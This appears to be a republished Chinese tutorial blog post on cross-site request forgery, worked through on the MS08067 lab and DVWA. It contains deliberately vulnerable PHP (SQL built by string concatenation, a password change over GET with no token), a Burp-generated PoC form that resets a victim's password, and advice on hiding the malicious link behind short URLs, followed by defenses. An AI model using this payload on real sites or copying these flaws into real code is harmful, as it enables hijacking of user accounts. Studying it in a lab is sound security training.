ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

CSRF

2022-01-13 06:33:50  阅读:211  来源: 互联网

标签:XSS 受害者 res CSRF mysqli ___


0x00-引言

困了

0x01-CSRF描述

CSRF(Cross-site request forgery,跨站请求伪造)也被称为One Client Attack或者Session Riding,通常缩写为CSRF和XSRF,是一种对网站的恶意利用。尽管听起像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任的用户,而CSRF则通过伪装成受信任用户请求受信任的网站。

危害:

以受害者名义发送邮件,发消息,盗取受害者的账号,甚至购买商品,虚拟货币转账,修改受害者的网络配置(比如修改路由器DNS、重置路由器密码)等等。。造成的问题包括:个人隐私泄露、机密资料泄露、用户甚至企业的财产安全;一句话概括CSRF的危害:盗用受害者身份,受害者能做什么,攻击者就能以受害者的身份做什么。

0x02-CSRF漏洞原理

image-20220113031401525

​ CSRF的攻击过程有两个重点:

  • 用户登录了网站,浏览器存在Cookie
  • 用户访问了攻击者构造的恶意URL

0x03-CSRF演示

01-MS08067 web安全攻防配套靶场演示

靶场:phpstudy + MS08067 web安全攻防配套靶场

目标:通过攻击向数据库添加用户

image-20220113050914523

登录靶场

image-20220113045856194

抓包

image-20220113050129893

改包

image-20220113050334080

右键生成POC

image-20220113050410235

image-20220113050434989

复制HTML-放到web目录下面-浏览器打开

image-20220113050612645

点击

image-20220113050652881

由上两张图URL对比可知,二者不是同一网站

查看点击之后的数据包

image-20220113051332193

image-20220113050942332

01-代码分析
<?php
    @header("content-Type: text/html; charset=utf-8");//语言强制
	session_start();
	if (isset($_GET['login'])){                       //获取login值
		$con=mysqli_connect("localhost","root","root","test");//连接数据库
		if (mysqli_connect_errno())
		{
			echo "连接失败: " . mysqli_connect_error();
		}
		$username = addslashes($_GET['username']);//获取username值
		$password = $_GET['password'];//过去password
		$result = mysqli_query($con,"select * from users where `username`='".$username."' and `password`='".$password."'");//查询数据库用户是否存在
		$row = mysqli_fetch_array($result);
		if ($row) {                    //判断赋值
			$_SESSION['isadmin'] = 'admin';
			echo "登录成功";
		}else{
			$_SESSION['isadmin'] = 'guest';
			echo "登录失败";
		}
	}else{
		$_SESSION['isadmin'] = 'guest';
	}
	if ($_SESSION['isadmin'] != 'admin'){
		echo "请登录后台";
	} 
	if (isset($_POST['submit'])) {                   //接收submit的值
		$con=mysqli_connect("localhost","root","root","test");
		if (mysqli_connect_errno())
		{
			echo "连接失败: " . mysqli_connect_error();
		}
		if (isset($_POST['username'])) {
			$result1 = mysqli_query($con,"insert into users(username,password) VALUES ('".$_POST['username']."','".md5($_POST['password'])."')");  //添加用户
			echo "<hr />";
			echo $_POST['username']."添加成功";
		}
	}
?>
02-DVWA-CSRF
01-low级别

服务器通过GET方式接收密码修改请求,没有任何的CSRF防御机制,如果两次密码输入一致,cookie没有改变,就会修改密码。

源码

<?php

if( isset( $_GET[ 'Change' ] ) ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

        // Feedback for the user
        echo "<pre>Password Changed.</pre>";
    }
    else {
        // Issue with passwords matching
        echo "<pre>Passwords did not match.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

构建POC:

通过神器burpsuit构建poc,在网页根目录下新建一个html文件,把poc放入其中。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
   <script>history.pushState('', '', '/')</script>
<form action="http://localhost/dvwa/vulnerabilities/csrf/">
  <input type="hidden" name="password&#95;new" value="123456" />
  <input type="hidden" name="password&#95;conf" value="123456" />
  <input type="hidden" name="Change" value="Change" />
  <input type="submit" value="Submit request" />
</form>
   </body>
</html>

构建EXP:

  • 构建链接,受害者点击触发,密码被修改。

    http://www.**.com/1.html

  • 使用短链接来隐藏URL

    为了更加隐蔽,可以生成短网址链接,点击短链接,会自动跳转到真实网站

  • 构造攻击页面:参考:https://www.cnblogs.com/yyxianren/p/11381285.html

0x04-漏洞防御

  • 验证Referer值,如果Referer是以自己的网站开头的域名,则说明该请求来自网站自己,是合法的。否则是不合法的。该方法可以别绕过
  • 添加Token,Token的值只有客户端和服务器知道,具有随机性,如果页面存在XSS,则攻击者可以获取到Token

0x05-参考

《Web安全攻防:渗透测试实战指南》

《白帽子讲WEB安全》

《Web安全深度剖析》

标签:XSS,受害者,res,CSRF,mysqli,___
来源: https://www.cnblogs.com/peace-and-romance/p/15796116.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有